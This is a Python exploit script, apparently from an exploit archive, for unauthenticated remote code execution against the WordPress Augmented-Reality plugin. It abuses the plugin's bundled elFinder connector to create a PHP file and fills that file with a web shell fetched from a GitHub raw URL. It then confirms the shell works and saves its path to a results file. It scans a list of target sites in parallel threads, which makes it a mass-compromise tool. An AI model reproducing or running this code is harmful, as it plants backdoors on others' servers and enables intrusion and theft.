# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import requests as req import json import sys import random import uuid import urllib.parse import urllib3 from multiprocessing.dummy import Pool as ThreadPool urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) filename="{}.php".format(str(uuid.uuid4())[:8]) proxies = {} #proxies = { #  'http': 'http://127.0.0.1:8080', #  'https': 'http://127.0.0.1:8080', #} phash = "l1_Lw" r=req.Session() user_agent={ "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } r.headers.update(user_agent) def is_json(myjson):   try:     json_object = json.loads(myjson)   except ValueError as e:     return False   return True def mkfile(target):     data={"cmd" : "mkfile", "target":phash, "name":filename}     resp=r.post(target, data=data)     respon = resp.text     if resp.status_code == 200 and is_json(respon):         resp_json=respon.replace(r"\/", "").replace("\\", "")         resp_json=json.loads(resp_json)         return resp_json["added"][0]["hash"]     else:         return False def put(target, hash):     content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)     content=content.text     data={"cmd" : "put", "target":hash, "content": content}     respon=r.post(target, data=data, proxies=proxies, verify=False)     if respon.status_code == 200:       return True def exploit(target):     try:         vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)         respon=r.get(vuln_path, proxies=proxies, verify=False).status_code         if respon != 200:           print("[FAIL] {}".format(target))           return         hash=mkfile(vuln_path)         if hash == False:           print("[FAIL] {}".format(target))           return         if put(vuln_path, hash):           shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)           status = r.get(shell_path, proxies=proxies, verify=False).status_code           if status==200 :               with open("result.txt", "a") as newline:                   newline.write("{}\n".format(shell_path))                   newline.close()               print("[OK] {}".format(shell_path))               return           else:               print("[FAIL] {}".format(target))               return         else:           print("[FAIL] {}".format(target))           return     except req.exceptions.SSLError:           print("[FAIL] {}".format(target))           return     except req.exceptions.ConnectionError:           print("[FAIL] {}".format(target))           return def main():     threads = input("[?] Threads > ")     list_file = input("[?] List websites file > ")     print("[!] all result saved in result.txt")     with open(list_file, "r") as file:         lines = [line.rstrip() for line in file]         th = ThreadPool(int(threads))         th.map(exploit, lines) if __name__ == "__main__":     main()